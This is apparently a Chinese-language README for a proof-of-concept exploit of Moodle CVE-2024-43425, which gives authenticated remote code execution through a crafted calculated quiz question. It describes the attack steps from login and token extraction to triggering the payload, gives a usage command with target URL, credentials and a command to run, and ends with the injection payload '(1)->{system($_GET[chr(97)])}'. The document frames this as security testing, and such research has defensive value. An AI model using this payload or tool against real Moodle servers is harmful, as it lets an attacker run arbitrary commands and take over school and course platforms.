
针对Moodle CVE-2024-43425的概念验证漏洞利用,通过精心设计的计算题实现认证RCE。自动执行登录、令牌提取、载荷上传和触发,用于安全测试。
CVE ID: CVE-2024-43425
描述: Moodle 允许经过身份验证的教师级用户通过测验编辑器界面上传恶意的计算题。 影响: 远程代码执行 (RCE) 原因: 对计算题内的数学负载清理不当,导致通过数据集向导实现命令注入。
| 步骤 | 描述 |
|---|---|
| 1️⃣ | 获取登录令牌 (logintoken) |
| 2️⃣ | 登录并建立有效的 MoodleSession |
| 3️⃣ | 从测验编辑页面提取 sesskey、ctxid 和 category |
| 4️⃣ | 上传一个特制的包含 RCE 负载的计算题 |
| 5️⃣ | 通过数据集向导页面触发负载 |
要求:
pip3 install requests bs4
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
answer[0] = "(1)->{system($_GET[chr(97)])}"